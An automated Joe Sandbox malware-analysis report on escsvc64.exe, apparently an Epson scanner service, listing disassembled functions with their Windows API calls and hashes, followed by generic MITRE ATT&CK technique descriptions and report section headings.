Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060F0

GetCurrentThreadId.KERNEL32 ref: 0000000140006298

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProcValue$CurrentSleepThread
String ID:
API String ID: 2474595895-0
Opcode ID: 11a1c2b9ce6cae87f56cc3a97f503640f7858b5fc67d15d9ec78c283fe98477f
Instruction ID: b64a60eea287b767be27ce808611aed3f311df57d353ba07e377f7b491abde7b
Opcode Fuzzy Hash: 11a1c2b9ce6cae87f56cc3a97f503640f7858b5fc67d15d9ec78c283fe98477f
Instruction Fuzzy Hash: 2A014C70200B0186FB56EF73B4583E92292EB8CBE0F484224FB661B3F5EE78C8048600

Function 00000001400061B0 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 00000001400061BA
FlsGetValue.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 00000001400061C8
SetLastError.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006223

Part of subcall function 0000000140008A40: Sleep.KERNEL32(?,?,?,00000001400061E3,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140008A90

FlsSetValue.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 00000001400061F4

Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32(00000000,?,?,0000000140006208,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006046
Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32 ref: 0000000140006089
Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060D8
Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060F0

GetCurrentThreadId.KERNEL32 ref: 0000000140006208

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProcValue$CurrentSleepThread
String ID:
API String ID: 2474595895-0
Opcode ID: 3df6b742ed069dc10a990c89e0a00f9449d85f0a5b3961fb99b29ae4aa2903f0
Instruction ID: fd70356aea30289e2ff4ef2970fb409e0440e4843ff398306ddbe7ed0b522322
Opcode Fuzzy Hash: 3df6b742ed069dc10a990c89e0a00f9449d85f0a5b3961fb99b29ae4aa2903f0
Instruction Fuzzy Hash: E9016270601B0186FB56EFB3B4583A92692EB8CBE0F484224FF661B3F5EE7CC4458611

Function 00455BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00455BC8
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00455CB0

Strings

csm, xrefs: 00455D02
csm, xrefs: 00455BEA

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b5d7381fdd729d40f201ae6ed7f1741eaecd7a76e3394a9f35f9a9b9338acbd8
Instruction ID: 41dbf1cd390d1182d46982be1885cc9aa499d9fea12d7f7de77fe435d0e00611
Opcode Fuzzy Hash: b5d7381fdd729d40f201ae6ed7f1741eaecd7a76e3394a9f35f9a9b9338acbd8
Instruction Fuzzy Hash: 2F616E31614F088BCB689F58909837573E1FB58316F64465FE889C7397CB38D889CB8A

Function 0000000180005C78 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180005CA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000000180005D88

Strings

csm, xrefs: 0000000180005DDA
csm, xrefs: 0000000180005CC2

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: dfee173dcd499577b71966c6b9e68e04b1d122c49cf8e12d755bea0b90d5e3af
Instruction ID: 6f0966b1c37cdfb9bfd8f54508303ee82dc0ab7b6ab2dafb2caee482863340a0
Opcode Fuzzy Hash: dfee173dcd499577b71966c6b9e68e04b1d122c49cf8e12d755bea0b90d5e3af
Instruction Fuzzy Hash: 10715D30614A4D8FEBE9DF18C4887A673D1EB5C352F54865AF489C7292DF70DA88C782

Function 000000014000CDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140005F50: FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70

Part of subcall function 0000000140004A40: RtlCaptureContext.KERNEL32 ref: 0000000140004A51
Part of subcall function 0000000140004A40: IsDebuggerPresent.KERNEL32 ref: 0000000140004A95
Part of subcall function 0000000140004A40: SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004A9F
Part of subcall function 0000000140004A40: UnhandledExceptionFilter.KERNEL32 ref: 0000000140004AAA
Part of subcall function 0000000140004A40: GetCurrentProcess.KERNEL32 ref: 0000000140004AC0
Part of subcall function 0000000140004A40: TerminateProcess.KERNEL32 ref: 0000000140004ACE

GetModuleHandleA.KERNEL32 ref: 000000014000CE2D
GetProcAddress.KERNEL32 ref: 000000014000CE42

Strings

kernel32.dll, xrefs: 000000014000CE26
InitializeCriticalSectionAndSpinCount, xrefs: 000000014000CE38

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$AddressCaptureContextCurrentDebuggerHandleModulePresentProcTerminateValue
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 1369895830-3733552308
Opcode ID: 6d8b5d62b63a9c4ae9bd89e2a175ac80a50603bd7851d00847f4974ceda82b2b
Instruction ID: 49e8813b4deb30a237d27fc7e6402217b36d86e19928ae94c256e37d805b8284
Opcode Fuzzy Hash: 6d8b5d62b63a9c4ae9bd89e2a175ac80a50603bd7851d00847f4974ceda82b2b
Instruction Fuzzy Hash: F9214D71625B9182EB56DB13F8007DAA3A6B79C7C0F880126BB4E47775EF78C404C704

Function 0000000140001200 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerExW.ADVAPI32 ref: 0000000140001220
SetServiceStatus.ADVAPI32 ref: 000000014000128C
SetServiceStatus.ADVAPI32 ref: 00000001400012DF

Part of subcall function 0000000140001460: CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 0000000140001481
Part of subcall function 0000000140001460: CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400014A3
Part of subcall function 0000000140001460: RegisterDeviceNotificationW.USER32 ref: 0000000140001528
Part of subcall function 0000000140001460: SetServiceStatus.ADVAPI32 ref: 000000014000156E
Part of subcall function 0000000140001460: WaitForMultipleObjects.KERNEL32 ref: 00000001400015A8
Part of subcall function 0000000140001460: UnregisterDeviceNotification.USER32 ref: 00000001400015C9
Part of subcall function 0000000140001460: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015E0
Part of subcall function 0000000140001460: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015FC

Strings

EpsonScanSvc, xrefs: 0000000140001216

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Service$Status$CloseCreateDeviceEventHandleNotificationRegister$CtrlHandlerMultipleObjectsUnregisterWait
String ID: EpsonScanSvc
API String ID: 498100820-1444984947
Opcode ID: a5d94d1c1bc15c57b6d9f01a09ccb7c220a53ae407c958d311d4c21d33b5df47
Instruction ID: 597997962a0f345a41b2b22026f52100171705740471e8a7026cae0ea810d904
Opcode Fuzzy Hash: a5d94d1c1bc15c57b6d9f01a09ccb7c220a53ae407c958d311d4c21d33b5df47
Instruction Fuzzy Hash: E52190B06116108BFB578F56F854BD13AB5B74C7D8F44411AFA8D8B271CBBE84498B44

Function 00455620 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 292COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 004556DB

Strings

RCC, xrefs: 004556AC
MOC, xrefs: 004556A4

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 41de56702f982b64fe2f38222c95c0c4c6bb52bfbfe6eb78f609202fb18988d9
Instruction ID: a917e7c52979a002b4e908c14a8e17dfce2e1bba01026d5f22eee223206ce27b
Opcode Fuzzy Hash: 41de56702f982b64fe2f38222c95c0c4c6bb52bfbfe6eb78f609202fb18988d9
Instruction Fuzzy Hash: CCA1A430518F488FCB14EF68C4959A9BBF0FB99309F14465EE849C7252DB38E585CB86

Function 00000001800056F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 292COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000001800057B3

Strings

RCC, xrefs: 0000000180005784
MOC, xrefs: 000000018000577C

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 363d6bb0ba7862c09730f605770ad3bf4a01eab7ca613770e0679e36364e9edf
Instruction ID: 782d132307fa3ec13c881fd6add66bb0f9351700a0533e7473bfc9cd57bf72e9
Opcode Fuzzy Hash: 363d6bb0ba7862c09730f605770ad3bf4a01eab7ca613770e0679e36364e9edf
Instruction Fuzzy Hash: 18A1C130518B488FDB55EF28C485BE9BBE0FB99344F14865EF489C7192DF34A685CB82

Function 00455DD8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00455E02

Strings

csm, xrefs: 00455F96
csm, xrefs: 00455E27

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 344832f059a35b2f2b4cab6af87e1e87aee7c388f65b12589a663b30c40c0269
Instruction ID: 1b1c56f56830841ea04eb985c52123fce8d7edecec28d44a7443fa15cfef9970
Opcode Fuzzy Hash: 344832f059a35b2f2b4cab6af87e1e87aee7c388f65b12589a663b30c40c0269
Instruction Fuzzy Hash: CD710530218E448BCB68DF18C494279B7E1FB98716F54426FEC8DC7297DB389989C786

Function 0000000180005EB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180005EDA

Strings

csm, xrefs: 000000018000606E
csm, xrefs: 0000000180005EFF

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 20aa8ab74dc3e8fd67a9e3c7bb82e1dcf2a23def2c78b1fd2bc7fe295e731d49
Instruction ID: 81675698e28cb140139ea40df420a562aeb6be9398de3bb29cb6a4704c2524ca
Opcode Fuzzy Hash: 20aa8ab74dc3e8fd67a9e3c7bb82e1dcf2a23def2c78b1fd2bc7fe295e731d49
Instruction Fuzzy Hash: FF811930508A498BDBAADF18C0843F5B7D1FB9D345F14C16DF489CB2A6DE349A85C782

Function 00453C10 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00453C3B
_IsNonwritableInCurrentImage.LIBCMT ref: 00453CD2

Strings

csm, xrefs: 00453CB9

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: cf8e509d570c1848d0f9797bc63c7dafb47f65f362302048ea0467d3f3ad287b
Instruction ID: 9193cab18bdc160d15f731e8d57740147f9db24268e610c38568c9abcd6ebcf8
Opcode Fuzzy Hash: cf8e509d570c1848d0f9797bc63c7dafb47f65f362302048ea0467d3f3ad287b
Instruction Fuzzy Hash: EC61D530208A088BCF28EE5CD48567577F1FB55392F10456FEC86C3257EA39ED598B89

Function 004553B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0045545B

Strings

MOC, xrefs: 00455423
RCC, xrefs: 0045542B

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 61cf8898ebdfdc3fdd320f5ed4e2e062973869c9246d2cdf7cee2fcfd1f74536
Instruction ID: 5757a0e22f1a45b1ee541d986a9736cf9731e51bf38c43b03fbf5a3676040a5b
Opcode Fuzzy Hash: 61cf8898ebdfdc3fdd320f5ed4e2e062973869c9246d2cdf7cee2fcfd1f74536
Instruction Fuzzy Hash: 6571B330518B489FD724EF18C442BAAB7E0FB99315F144A5EE889C3212DB78E585CB87

Function 0000000180005488 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000000180005533

Strings

RCC, xrefs: 0000000180005503
MOC, xrefs: 00000001800054FB

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: cbdf1a0405eeeb9ee19cbaa3932b057c3defabee4b796518833c7a9b81170068
Instruction ID: 2573f572de498be4df4f1860bd609dea17f29197c62f27e4b8dccf343337cd0c
Opcode Fuzzy Hash: cbdf1a0405eeeb9ee19cbaa3932b057c3defabee4b796518833c7a9b81170068
Instruction Fuzzy Hash: 8D719230518B4C8FE7A5DF18C446BE6B7E0FB9C345F508A5EE4C9C3252DB74A5858B82

Function 0000000180003CE8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180003D13
_IsNonwritableInCurrentImage.LIBCMT ref: 0000000180003DAA

Strings

csm, xrefs: 0000000180003D91

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: df8b22781e2b7e9397aa037661e54ee7935159f332a0a33616de54d4796eae03
Instruction ID: 2d8cbc02748ef7321837904150ba0fde8245bbbc29b9dd48ee64278b709af079
Opcode Fuzzy Hash: df8b22781e2b7e9397aa037661e54ee7935159f332a0a33616de54d4796eae03
Instruction Fuzzy Hash: D871D930618A4C4BEBAAEE1DD4867B477D5EB58390F10826DF84AC32C6EE34ED558781

Function 00456470 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0045651A
_CreateFrameInfo.LIBVCRUNTIME ref: 00456543

Strings

csm, xrefs: 00456643

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 20d9dd5868b5ec9e0a42498d2107ce69bc8ea7373916fa7eb109017716fd0d1a
Instruction ID: 56dcee641f37f6566c3688a03976590f84b1c0741d70bcb91f50f0da27585437
Opcode Fuzzy Hash: 20d9dd5868b5ec9e0a42498d2107ce69bc8ea7373916fa7eb109017716fd0d1a
Instruction Fuzzy Hash: E75173B1918B099FC760EF2DC48666AB7E0FB58356F50055FE889C3222DB34E945CB86

Function 0000000180006548 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000001800065F2
_CreateFrameInfo.LIBVCRUNTIME ref: 000000018000661B

Strings

csm, xrefs: 000000018000671B

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: ce40aefc9edf07df887317f444d5c0bd08fe4ad5eae95838032d3f9405fedf99
Instruction ID: f7c9971cb605d5fff1342d11b9a52e1eaddacd09fb7810c935e50d82192d7268
Opcode Fuzzy Hash: ce40aefc9edf07df887317f444d5c0bd08fe4ad5eae95838032d3f9405fedf99
Instruction Fuzzy Hash: 695190B1518B489FE7A1EF2880467A977E0FB5D391F10455EF189C7262CF30EA45CB82

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report escsvc64.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

